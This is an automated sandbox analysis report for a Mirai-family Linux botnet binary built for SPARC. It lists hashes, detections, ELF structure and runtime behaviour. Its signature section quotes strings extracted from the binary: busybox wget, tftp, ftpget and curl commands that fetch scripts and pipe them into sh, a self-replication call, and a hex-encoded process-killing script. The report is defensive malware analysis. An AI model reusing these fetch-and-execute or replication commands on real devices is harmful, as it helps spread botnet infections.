Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
nklspc.elf

Overview

General Information

Sample name:nklspc.elf
Analysis ID:1543106
MD5:b044c47fcca3ae109761713fa260d898
SHA1:17713dba3119a91eb8db18038a3f807c87dd0338
SHA256:b9f9bab745f3047dafe3290261c705aac909073db3514e7aac864dfd39c0030b
Tags:elfuser-abuse_ch
Infos:

Detection

Score:48
Range:0 - 100
Whitelisted:false

Signatures

Multi AV Scanner detection for submitted file
Found strings indicative of a multi-platform dropper
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample has stripped symbol table
Sample listens on a socket
Uses the "uname" system call to query kernel version information (possible evasion)

Classification

General Information

Joe Sandbox version:41.0.0 Charoite
Analysis ID:1543106
Start date and time:2024-10-27 09:05:32 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 4m 38s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:nklspc.elf
Detection:MAL
Classification:mal48.linELF@0/0@0/0

Warnings

  • Skipping network analysis since amount of network traffic is too extensive
  • VT rate limit hit for: nklspc.elf

Runtime Messages

Command:/tmp/nklspc.elf
PID:5521
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
The Peoples Bank of China.
Standard Error:

Process Tree

  • system is lnxubuntu20
  • nklspc.elf (PID: 5521, Parent: 5442, MD5: 7dc1c0e23cd5e102bb12e5c29403410e) Arguments: /tmp/nklspc.elf
  • cleanup

Yara Signatures

No yara matches

Suricata Signatures

No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Multi AV Scanner detection for submitted file
Source: nklspc.elfReversingLabs: Detection: 47%
Source: nklspc.elfString: incorrectinvalidbadwrongfaildeniederrorretryenableshellshlinuxshellping ;shusage: busybox/bin/busybox hostname PBOC/bin/busybox echo > .b && sh .b && cd /bin/busybox echo -ne >> .ksh .k/bin/busybox wget http:///wget.sh -O- | sh;/bin/busybox tftp -g -r tftp.sh -l- | sh;/bin/busybox ftpget ftpget.sh ftpget.sh && sh ftpget.sh;curl http:///curl.sh -o- | shGET /dlr. HTTP/1.0
Source: /tmp/nklspc.elf (PID: 5521)Socket: 127.0.0.1:39148Jump to behavior
Source: nklspc.elfString found in binary or memory: http:///curl.sh
Source: nklspc.elfString found in binary or memory: http:///wget.sh
Source: Initial sampleString containing 'busybox' found: /bin/busybox
Source: Initial sampleString containing 'busybox' found: usage: busybox
Source: Initial sampleString containing 'busybox' found: /bin/busybox hostname PBOC
Source: Initial sampleString containing 'busybox' found: /bin/busybox echo >
Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne
Source: Initial sampleString containing 'busybox' found: /bin/busybox wget http://
Source: Initial sampleString containing 'busybox' found: /wget.sh -O- | sh;/bin/busybox tftp -g
Source: Initial sampleString containing 'busybox' found: -r tftp.sh -l- | sh;/bin/busybox ftpget
Source: Initial sampleString containing 'busybox' found: /bin/busybox chmod +x .d; ./.d; ./dvrHelper selfrep
Source: Initial sampleString containing 'busybox' found: incorrectinvalidbadwrongfaildeniederrorretryenableshellshlinuxshellping ;shusage: busybox/bin/busybox hostname PBOC/bin/busybox echo > .b && sh .b && cd /bin/busybox echo -ne >> .ksh .k/bin/busybox wget http:///wget.sh -O- | sh;/bin/busybox tftp -g -r tftp.sh -l- | sh;/bin/busybox ftpget ftpget.sh ftpget.sh && sh ftpget.sh;curl http:///curl.sh -o- | shGET /dlr. HTTP/1.0
Source: Initial sampleString containing 'busybox' found: > .d/bin/busybox chmod +x .d; ./.d; ./dvrHelper selfrepThe People's/tmp//var//var/run//var/tmp//dev//dev/shm//etc//mnt//usr//boot//home/"\x23\x21\x2F\x62\x69\x6E\x2F\x73\x68\x0A\x0A\x66\x6F\x72\x20\x70\x72\x6F\x63\x5F\x64\x69\x72\x20\x69\x6E\x20\x2F\x70\x72\x6F\x63""\x2F\x2A\x3B\x20\x64\x6F\x0A\x20\x20\x20\x20\x70\x69\x64\x3D\x24\x7B\x70\x72\x6F\x63\x5F\x64\x69\x72\x23\x23\x2A\x2F\x7D\x0A\x0A""\x20\x20\x20\x20\x72\x65\x73\x75\x6C\x74\x3D\x24\x28\x6C\x73\x20\x2D\x6C\x20\x22\x2F\x70\x72\x6F\x63\x2F\x24\x70\x69\x64\x2F\x65""\x78\x65\x22\x20\x32\x3E\x20\x2F\x64\x65\x76\x2F\x6E\x75\x6C\x6C\x29\x0A\x0A\x20\x20\x20\x20\x69\x66\x20\x5B\x20\x22\x24\x72\x65""\x73\x75\x6C\x74\x22\x20\x21\x3D\x20\x22\x24\x7B\x72\x65\x73\x75\x6C\x74\x25\x28\x64\x65\x6C\x65\x74\x65\x64\x29\x7D\x22\x20\x5D""\x3B\x20\x74\x68\x65\x6E\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x6B\x69\x6C\x6C\x20\x2D\x39\x20\x22\x24\x70\x69\x64\x22\x0A\x20\x20""\x20\x20\x66\x69\x0A\x64\x6F\x6E\x65\x0A"armarm5arm6arm7mipsmpslppcspcsh4
Source: ELF static info symbol of initial sample.symtab present: no
Source: classification engineClassification label: mal48.linELF@0/0@0/0
Source: /tmp/nklspc.elf (PID: 5521)Queries kernel information via 'uname': Jump to behavior
Source: nklspc.elf, 5521.1.00005576f0518000.00005576f059d000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/sparc
Source: nklspc.elf, 5521.1.00005576f0518000.00005576f059d000.rw-.sdmpBinary or memory string: vU!/etc/qemu-binfmt/sparc
Source: nklspc.elf, 5521.1.00007ffe257c1000.00007ffe257e2000.rw-.sdmpBinary or memory string: /usr/bin/qemu-sparc
Source: nklspc.elf, 5521.1.00007ffe257c1000.00007ffe257e2000.rw-.sdmpBinary or memory string: C{}x86_64/usr/bin/qemu-sparc/tmp/nklspc.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/nklspc.elf

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information1
Scripting		Valid AccountsWindows Management Instrumentation1
Scripting		Path InterceptionDirect Volume AccessOS Credential Dumping11
Security Software Discovery		Remote ServicesData from Local SystemData ObfuscationExfiltration Over Other Network MediumAbuse Accessibility Features

Malware Configuration

No configs have been found

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Number of created Files
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1543106 Sample: nklspc.elf Startdate: 27/10/2024 Architecture: LINUX Score: 48 13 Multi AV Scanner detection for submitted file 2->13 7 nklspc.elf 2->7         started        process3 process4 9 nklspc.elf 7->9         started        process5 11 nklspc.elf 9->11         started       

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
nklspc.elf47%ReversingLabsLinux.Backdoor.Mirai

Dropped Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

No contacted domains info

URLs from Memory and Binaries

NameSourceMaliciousAntivirus DetectionReputation
http:///wget.shnklspc.elffalse
    		unknown
    http:///curl.shnklspc.elffalse
      		unknown

      World Map of Contacted IPs

      No contacted IP infos

      Joe Sandbox View / Context

      IPs

      No context

      Domains

      No context

      ASNs

      No context

      JA3 Fingerprints

      No context

      Dropped Files

      No context

      Created / dropped Files

      No created / dropped files found

      Static File Info

      General

      File type:ELF 32-bit MSB executable, SPARC, version 1 (SYSV), statically linked, stripped
      Entropy (8bit):6.13143778855994
      TrID:
      • ELF Executable and Linkable format (generic) (4004/1) 100.00%
      File name:nklspc.elf
      File size:60'216 bytes
      MD5:b044c47fcca3ae109761713fa260d898
      SHA1:17713dba3119a91eb8db18038a3f807c87dd0338
      SHA256:b9f9bab745f3047dafe3290261c705aac909073db3514e7aac864dfd39c0030b
      SHA512:a4befacdd8d867671a84bd723ba532329af10c45a263f37d479f35385cfed4d6f708ba4da7c991eb79836bd564d6857bbbace1a209322ac108f771f2a97d342d
      SSDEEP:1536:F2PShXGfYApqb29fcf90gBHuqzIbH4MLh/V:QKv6u9XdaH42V
      TLSH:3C433B2179392E17C8C474BB65F74734B2A06B1E35E8C62A7E721F4EFB10A805117AF9
      File Content Preview:.ELF...........................4.........4. ...(....................................................................dt.Q................................@..(....@.5R................#.....a@..`.....!.....#...@.....".........`......$#...#...@...........`....

      Static ELF Info

      ELF header

      Class:ELF32
      Data:2's complement, big endian
      Version:1 (current)
      Machine:Sparc
      Version Number:0x1
      Type:EXEC (Executable file)
      OS/ABI:UNIX - System V
      ABI Version:0
      Entry Point Address:0x101a4
      Flags:0x0
      ELF Header Size:52
      Program Header Offset:52
      Program Header Size:32
      Number of Program Headers:3
      Section Header Offset:59776
      Section Header Size:40
      Number of Section Headers:11
      Header String Table Index:10

      Sections

      NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
      NULL0x00x00x00x00x0000
      .initPROGBITS0x100940x940x1c0x00x6AX004
      .textPROGBITS0x100b00xb00xd5800x00x6AX004
      .finiPROGBITS0x1d6300xd6300x140x00x6AX004
      .rodataPROGBITS0x1d6480xd6480x11680x00x2A008
      .ctorsPROGBITS0x2e7b40xe7b40x80x00x3WA004
      .dtorsPROGBITS0x2e7bc0xe7bc0x80x00x3WA004
      .jcrPROGBITS0x2e7c40xe7c40x40x00x3WA004
      .dataPROGBITS0x2e7c80xe7c80x1740x00x3WA008
      .bssNOBITS0x2e9400xe93c0x1900x00x3WA008
      .shstrtabSTRTAB0x00xe93c0x430x00x0001

      Program Segments

      TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
      LOAD0x00x100000x100000xe7b00xe7b06.16590x5R E0x10000.init .text .fini .rodata
      LOAD0xe7b40x2e7b40x2e7b40x1880x31c0.84930x6RW 0x10000.ctors .dtors .jcr .data .bss
      GNU_STACK0x00x00x00x00x00.00000x6RW 0x4

      Network Behavior

      Skipped network analysis since the amount of network traffic is too extensive. Please download the PCAP and check manually.

      System Behavior

      General

      Start time (UTC):08:06:31
      Start date (UTC):27/10/2024
      Path:/tmp/nklspc.elf
      Arguments:/tmp/nklspc.elf
      File size:4379400 bytes
      MD5 hash:7dc1c0e23cd5e102bb12e5c29403410e

      Chronological Activities


      General

      Start time (UTC):08:06:31
      Start date (UTC):27/10/2024
      Path:/tmp/nklspc.elf
      Arguments:-
      File size:4379400 bytes
      MD5 hash:7dc1c0e23cd5e102bb12e5c29403410e

      Chronological Activities


      General

      Start time (UTC):08:06:31
      Start date (UTC):27/10/2024
      Path:/tmp/nklspc.elf
      Arguments:-
      File size:4379400 bytes
      MD5 hash:7dc1c0e23cd5e102bb12e5c29403410e

      Chronological Activities